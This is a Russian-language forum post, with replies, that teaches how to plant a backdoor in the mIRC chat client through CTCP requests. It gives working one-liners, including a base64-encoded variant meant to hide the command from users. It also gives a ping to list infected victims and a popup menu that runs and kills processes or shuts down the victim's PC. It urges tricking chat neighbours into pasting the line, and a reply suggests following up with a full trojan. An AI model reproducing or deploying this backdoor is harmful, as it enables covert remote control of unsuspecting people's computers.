Интернет кишит статьями о том что можно заразить mirc клиент простейшим бэкдором, который будет работать через ctcp запросы, везде он описывается так: Code: [B]//write conf.mrc ctcp 1:*:?:$1- | Load -rs conf.mrc[/B] Это должна набрать наша жертва, тоесть создается файл-скрипт и подгружается в клиент.Но есть один огромный минус такого бэкдора - все наши ctcp запросы будут палиться в статусе. Как же этого избежать? Если покопаться в хэлпе то нетрудно найти алиас haltdef блокирующий стандартный ответ на вызванную команду\алиас\функцию. Чуть чуть поэкпериментировав пришли к такому бэкдору Code: [B]//write config.mrc ctcp ^*:*:*: { haltdef | $1- } | //Load -rs config.mrc [/B] Но для человека хоть чуточку понимающего в скриптинге\кодинге покажется опасной такая строка. Лучше просто обходить бдительных людей стороной или брать их на слабо ) Благо mirc богат своими функциями и позволяет кодировать команды. В результате имеем такой код бэкдора Code: [B]//write conf.mrc $decode(Y3RjcCBeKjoqOio6IHsgaGFsdGRlZiB8ICQxLSB9,m) | load -rs conf.mrc[/B] Такое кажется втюхать соседям по чату труднее, но это только кажется, ведь все проявляют интерес что же это, можнопросто написать это на канале и найдутся те кто посмотрят, что она выполняет. После того как вы попестрите этим сообщением нужно собирать первые плоды - например ctcp запрос на канал, который выявит заразившихся: Code: [B] /ctcp #chan /ping $me[/B] После сбора урожая в отдельный текстовичок можно приступить к работе с конкретными особями. Вставим этот код в Скрипты(Alt+R)->Меню->Приват Code: Троян .выполнить:/ctcp $$1 $$?="ВВеди чего хочешь делать" .запуск процесса:/ctcp $$1 /run $$?="ВВеди название или путь к процессу" .остановка процесса:/ctcp $$1 /run taskkill /F /IM $$?="ВВеди название или путь к процессу" .смена ника:/ctcp $$1 /nick $$?="ВВеди ник" .зайти на канал:/ctcp $$1 /join $$?="ВВеди канал" .покинуть канал:/ctcp $$1 /part $$?="ВВеди канал" .сказать:/ctcp $$1 /say $$?="Что сказать?" .вырубить винду:/ctcp $$1 /run exitwindows .перезагрузить комп:/ctcp $$1 /run shutdown -r -f -m Удачного веселья!
вообще-то если ты такой бекдор успешно кому-то впарил, то тут уже можно и троян впаривать полноценный, главное знать хорошо командную строку. decode по умолчанию в мирке отключен, потому его сначала стоит включить
заметь тут написано что тема боян, но в нее внесен важный новый аспект - отсутствие палевности твоего присутствия
сам mirc юзает минимальное количество людей, зато его производные и зточенные под себя скрипты юзает более половины пользователей IRC
Кстати во многих крупных ирц сетях (например dogm.net) стоит фильтр на такое. Так что требуется более извращенный метод))
